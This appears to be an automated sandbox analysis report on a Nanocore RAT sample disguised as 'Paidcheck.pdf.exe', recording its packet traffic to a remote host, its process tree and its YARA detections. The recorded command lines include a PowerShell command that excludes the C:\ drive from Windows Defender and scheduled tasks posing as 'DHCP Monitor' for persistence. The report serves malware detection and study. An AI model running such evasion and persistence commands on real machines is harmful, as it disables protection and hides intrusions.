                                                                          Jul 22, 2021 09:33:59.668450117 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.676424026 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.676582098 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.692431927 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.713453054 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.714766026 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.750545025 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.777388096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.777518034 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.786863089 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.800864935 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.800998926 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.823556900 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.842411995 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.842510939 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.850297928 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.861713886 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.865135908 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.869467974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.882478952 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.882572889 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.895797968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.912578106 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.912723064 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.949991941 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.993479013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.993580103 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.009231091 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.016278982 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.016627073 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.024384022 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.078775883 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.089085102 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.100263119 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.100378036 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.115302086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.133095980 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.133260012 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.150082111 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.166778088 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.166950941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.173075914 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.188682079 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.189166069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.203669071 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.250619888 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.288420916 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.294321060 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.294442892 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.303386927 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.312798977 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.312897921 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.322395086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.332878113 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.332987070 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.345494032 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.357359886 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.357440948 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.452893019 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.464427948 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.464567900 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.474500895 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.490668058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.490765095 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.503360987 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.520709038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.520816088 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.522670984 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.531475067 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.531619072 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.544415951 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.558434963 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.558639050 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.563431978 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.574357986 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.574559927 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.584412098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.593539000 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.593852997 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.601470947 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.616116047 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.616256952 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.624304056 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.634548903 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.634684086 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.637387991 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.651540041 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.651782990 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.662674904 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.673415899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.675432920 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.690422058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.704428911 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.704655886 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.723622084 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.732511044 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.732618093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.741506100 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.750482082 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.751476049 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.766474009 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.775655031 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.775804996 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.788451910 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.805483103 CEST201849704217.138.212.57192.168.2.3

                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Memory Usage

                                                                          High Level Behavior Distribution

                                                                          Behavior

                                                                          System Behavior

                                                                          General

Start time: 09:32:56
Start date: 22/07/2021
Path: C:\Users\user\Desktop\Paidcheck.pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
Imagebase: 0x6a0000
File size: 580096 bytes
MD5 hash: CE32E8605ADB6C9BB2DCEE69FE887B46
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation: low

                                                                          General

Start time: 09:33:42
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
Imagebase: 0x1030000
File size: 147456 bytes
MD5 hash: 7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                          General

Start time: 09:33:42
Start date: 22/07/2021
Path: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Imagebase: 0x760000
File size: 64616 bytes
MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal
                                                                          • Detection: 0%, Metadefender
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:43
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
                                                                          Imagebase:0x1260000
                                                                          File size:430592 bytes
                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:44
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:45
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:47
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:50
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                                                                          Imagebase:0xca0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                                          Imagebase:0x2a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal
                                                                          • Detection: 0%, Metadefender
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                          Imagebase:0x8a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET

                                                                          General

                                                                          Start time:09:33:57
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Disassembly

                                                                          Code Analysis


                                                                            Executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D
                                                                            • API String ID: 0-2746444292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B748
                                                                            • GetCurrentThread.KERNEL32 ref: 00E5B785
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B7C2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5B81B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID: Pn
                                                                            • API String ID: 2063062207-1375425085
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B748
                                                                            • GetCurrentThread.KERNEL32 ref: 00E5B785
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B7C2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5B81B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID: Pn
                                                                            • API String ID: 2063062207-1375425085
                                                                            • Opcode ID: 76cb0f82607f320d31d18a84684cf19b9b4e6c75dac984b963c03635bdfe97e4
                                                                            • Instruction ID: 1e7a12085af8a507ed58b685636bdaed4485f581991199477a1499cb4ee14bad
                                                                            • Opcode Fuzzy Hash: 76cb0f82607f320d31d18a84684cf19b9b4e6c75dac984b963c03635bdfe97e4
                                                                            • Instruction Fuzzy Hash: 6A5156B0D006498FDB14CFAAD588B9EBBF1EF88314F248559E419B7350DB74A849CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF7646
                                                                            Memory Dump Source
